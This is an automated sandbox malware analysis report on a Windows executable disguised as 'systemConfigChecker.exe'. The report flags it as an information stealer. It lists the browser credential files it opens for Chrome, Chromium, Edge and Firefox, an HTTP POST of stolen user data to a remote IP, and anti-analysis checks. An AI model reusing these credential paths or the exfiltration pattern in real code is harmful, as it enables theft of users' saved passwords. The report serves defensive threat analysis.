Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
systemConfigChecker.exe

Overview

General Information

Sample name:systemConfigChecker.exe
Analysis ID:1569875
MD5:218954f9dd70247e51af8a30940d5c33
SHA1:35ee01d3128951c3993079186fddc9c0dbe155f7
SHA256:95ec35703d323fe972a936d9b3574bb191e94b693656d94149897c5ff35f225f
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Contains functionality to steal Chrome passwords or cookies
Tries to harvest and steal browser information (history, passwords, etc)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to enumerate network shares
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Detected potential crypto function
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)

Classification

  • System is w10x64
  • systemConfigChecker.exe (PID: 7160 cmdline: "C:\Users\user\Desktop\systemConfigChecker.exe" MD5: 218954F9DD70247E51AF8A30940D5C33)
    • conhost.exe (PID: 2392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
Source: systemConfigChecker.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: F:\systemConfigChecker\x64\Release\systemConfigChecker.pdb(( source: systemConfigChecker.exe
Source: Binary string: F:\systemConfigChecker\x64\Release\systemConfigChecker.pdb source: systemConfigChecker.exe
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF64E133CD0 memset,NetUserEnum,NetApiBufferFree,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF64E133CD0
Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: WinHTTP/1.0Host: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: unknownHTTP traffic detected: POST /userdata HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WebKitFormBoundaryUser-Agent: WinHTTP/1.0Content-Length: 96458Host: 185.237.165.97
Source: systemConfigChecker.exe, 00000000.00000002.2342271317.0000028BAC0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/
Source: systemConfigChecker.exe, 00000000.00000002.2342271317.0000028BAC0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/a
Source: systemConfigChecker.exe, 00000000.00000002.2342271317.0000028BAC113000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.2314734639.0000028BAC112000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.2339875647.0000028BAC113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/userdata
Source: systemConfigChecker.exe, 00000000.00000003.2314734639.0000028BAC112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/userdataK
Source: systemConfigChecker.exe, 00000000.00000003.2339875647.0000028BAC125000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000002.2342271317.0000028BAC125000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/userdataP
Source: systemConfigChecker.exe, 00000000.00000002.2342271317.0000028BAC113000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.2314734639.0000028BAC112000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.2339875647.0000028BAC113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/userdataW
Source: systemConfigChecker.exe, 00000000.00000002.2342271317.0000028BAC0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97:80/userdata
Source: systemConfigChecker.exe, 00000000.00000002.2342271317.0000028BAC0C6000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.2312241316.0000028BAC0F9000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000002.2342271317.0000028BAC0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
Source: systemConfigChecker.exe, 00000000.00000003.2312241316.0000028BAC0F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/A
Source: systemConfigChecker.exe, 00000000.00000003.2312241316.0000028BAC0F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/a
Source: systemConfigChecker.exe, 00000000.00000003.2312241316.0000028BAC0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org:80/
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF64E131B500_2_00007FF64E131B50
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF64E135D800_2_00007FF64E135D80
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF64E134A400_2_00007FF64E134A40
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF64E134E500_2_00007FF64E134E50
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF64E1355100_2_00007FF64E135510
Source: classification engineClassification label: mal52.spyw.winEXE@2/1@1/2
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF64E133780 GetLogicalDrives,memset,GetDiskFreeSpaceExA,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF64E133780
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2392:120:WilError_03
Source: systemConfigChecker.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\systemConfigChecker.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: systemConfigChecker.exe, 00000000.00000003.2315033019.0000028BAC15A000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.2314734639.0000028BAC13A000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.2315336527.0000028BAC13A000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.2315336527.0000028BAC175000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.2315033019.0000028BAC16B000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.2314608886.0000028BAC14F000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.2315202946.0000028BAC147000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.2314608886.0000028BAC144000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unknownProcess created: C:\Users\user\Desktop\systemConfigChecker.exe "C:\Users\user\Desktop\systemConfigChecker.exe"
Source: C:\Users\user\Desktop\systemConfigChecker.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: samlib.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: kernel.appcore.dllJump to behavior
Source: systemConfigChecker.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: systemConfigChecker.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: systemConfigChecker.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: systemConfigChecker.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: systemConfigChecker.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: systemConfigChecker.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: systemConfigChecker.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: systemConfigChecker.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: systemConfigChecker.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: F:\systemConfigChecker\x64\Release\systemConfigChecker.pdb(( source: systemConfigChecker.exe
Source: Binary string: F:\systemConfigChecker\x64\Release\systemConfigChecker.pdb source: systemConfigChecker.exe
Source: systemConfigChecker.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: systemConfigChecker.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: systemConfigChecker.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: systemConfigChecker.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: systemConfigChecker.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: malloc,memset,GetAdaptersInfo,malloc,GetAdaptersInfo,free,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF64E133AA0
Source: C:\Users\user\Desktop\systemConfigChecker.exe TID: 6392Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF64E133560 GetSystemInfo,memset,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF64E133560
Source: systemConfigChecker.exe, 00000000.00000003.2314734639.0000028BAC125000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.2339875647.0000028BAC125000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000002.2342271317.0000028BAC125000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.2311270650.0000028BAC125000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: systemConfigChecker.exe, 00000000.00000002.2342271317.0000028BAC0C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW .
Source: C:\Users\user\Desktop\systemConfigChecker.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF64E13BFAC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF64E13BFAC
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF64E13C150 SetUnhandledExceptionFilter,0_2_00007FF64E13C150
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF64E13BFAC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF64E13BFAC
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF64E13BB00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF64E13BB00
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: GetLocaleInfoA,GetLocaleInfoA,memset,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ,??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ,??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF64E134640
Source: C:\Users\user\Desktop\systemConfigChecker.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF64E13C1BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF64E13C1BC
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF64E134180 GetTimeZoneInformation,memset,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF64E134180

Stealing of Sensitive Information

barindex
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data0_2_00007FF64E135510
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: \AppData\Local\Chromium\User Data\Default\Login Data0_2_00007FF64E135510
Source: C:\Users\user\Desktop\systemConfigChecker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ov4x28i2.default\times.jsonJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
1
Virtualization/Sandbox Evasion
2
OS Credential Dumping
1
Network Share Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
1
Credentials In Files
2
System Time Discovery
Remote Desktop Protocol1
Data from Local System
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager11
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Process Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
System Network Configuration Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync25
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://185.237.165.97/userdataK0%Avira URL Cloudsafe
http://185.237.165.97/a0%Avira URL Cloudsafe
http://185.237.165.97/userdataP0%Avira URL Cloudsafe
http://185.237.165.97:80/userdata0%Avira URL Cloudsafe
http://185.237.165.97/0%Avira URL Cloudsafe
http://185.237.165.97/userdata0%Avira URL Cloudsafe
http://185.237.165.97/userdataW0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
api.ipify.org
172.67.74.152
truefalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    http://api.ipify.org/AsystemConfigChecker.exe, 00000000.00000003.2312241316.0000028BAC0F9000.00000004.00000020.00020000.00000000.sdmpfalse
      high
      http://api.ipify.org/asystemConfigChecker.exe, 00000000.00000003.2312241316.0000028BAC0F9000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        http://api.ipify.org/systemConfigChecker.exe, 00000000.00000002.2342271317.0000028BAC0C6000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.2312241316.0000028BAC0F9000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000002.2342271317.0000028BAC0E6000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          http://185.237.165.97:80/userdatasystemConfigChecker.exe, 00000000.00000002.2342271317.0000028BAC0E6000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://185.237.165.97/userdataPsystemConfigChecker.exe, 00000000.00000003.2339875647.0000028BAC125000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000002.2342271317.0000028BAC125000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://185.237.165.97/userdataKsystemConfigChecker.exe, 00000000.00000003.2314734639.0000028BAC112000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://185.237.165.97/asystemConfigChecker.exe, 00000000.00000002.2342271317.0000028BAC0E6000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://api.ipify.org:80/systemConfigChecker.exe, 00000000.00000003.2312241316.0000028BAC0E6000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://185.237.165.97/systemConfigChecker.exe, 00000000.00000002.2342271317.0000028BAC0E6000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://185.237.165.97/userdatasystemConfigChecker.exe, 00000000.00000002.2342271317.0000028BAC113000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.2314734639.0000028BAC112000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.2339875647.0000028BAC113000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://185.237.165.97/userdataWsystemConfigChecker.exe, 00000000.00000002.2342271317.0000028BAC113000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.2314734639.0000028BAC112000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.2339875647.0000028BAC113000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            185.237.165.97
            unknownFrance
            52195AP-MEDIA-ASPLfalse
            172.67.74.152
            api.ipify.orgUnited States
            13335CLOUDFLARENETUSfalse
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1569875
            Start date and time:2024-12-06 10:55:12 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 2m 12s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:3
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:systemConfigChecker.exe
            Detection:MAL
            Classification:mal52.spyw.winEXE@2/1@1/2
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 29
            • Number of non-executed functions: 20
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Stop behavior analysis, all processes terminated
            • Exclude process from analysis (whitelisted): dllhost.exe
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtReadVirtualMemory calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • VT rate limit hit for: systemConfigChecker.exe
            TimeTypeDescription
            04:56:05API Interceptor1x Sleep call for process: systemConfigChecker.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            172.67.74.1522b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
            • api.ipify.org/
            Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
            • api.ipify.org/
            67065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
            • api.ipify.org/
            Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
            • api.ipify.org/
            4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
            • api.ipify.org/
            y8tCHz7CwC.binGet hashmaliciousXmrigBrowse
            • api.ipify.org/
            file.exeGet hashmaliciousUnknownBrowse
            • api.ipify.org/
            file.exeGet hashmaliciousUnknownBrowse
            • api.ipify.org/
            file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
            • api.ipify.org/
            file.exeGet hashmaliciousRDPWrap ToolBrowse
            • api.ipify.org/
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            api.ipify.orgkYGxoN4JVW.batGet hashmaliciousUnknownBrowse
            • 172.67.74.152
            REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.13.205
            PO54782322024.exeGet hashmaliciousAgentTeslaBrowse
            • 172.67.74.152
            https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2ddGet hashmaliciousEvilProxy, HTMLPhisherBrowse
            • 104.26.13.205
            https://url.us.m.mimecastprotect.com/s/tWC_CNkXmJcoqkvlsmfBIyQP6j?domain=assets-gbr.mkt.dynamics.comGet hashmaliciousEvilProxy, HTMLPhisherBrowse
            • 104.26.13.205
            lC7L7oBBMC.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.13.205
            0wxckB4Iba.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 172.67.74.152
            OHScaqAPjt.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
            • 172.67.74.152
            8JuGuaUaZP.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.13.205
            lUy4SKlE6A.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.12.205
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            AP-MEDIA-ASPLx86.elfGet hashmaliciousMirai, MoobotBrowse
            • 46.149.221.180
            file.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
            • 185.237.165.180
            pjczQr2H3P.exeGet hashmaliciousSocks5SystemzBrowse
            • 185.237.165.53
            9TSh73ulR1.exeGet hashmaliciousSocks5SystemzBrowse
            • 185.237.165.53
            0o37tv6BhU.elfGet hashmaliciousMiraiBrowse
            • 46.149.221.189
            YZfB2vyTrR.elfGet hashmaliciousMiraiBrowse
            • 46.149.221.169
            pSWP8vqTi4.elfGet hashmaliciousMirai, MoobotBrowse
            • 46.149.221.178
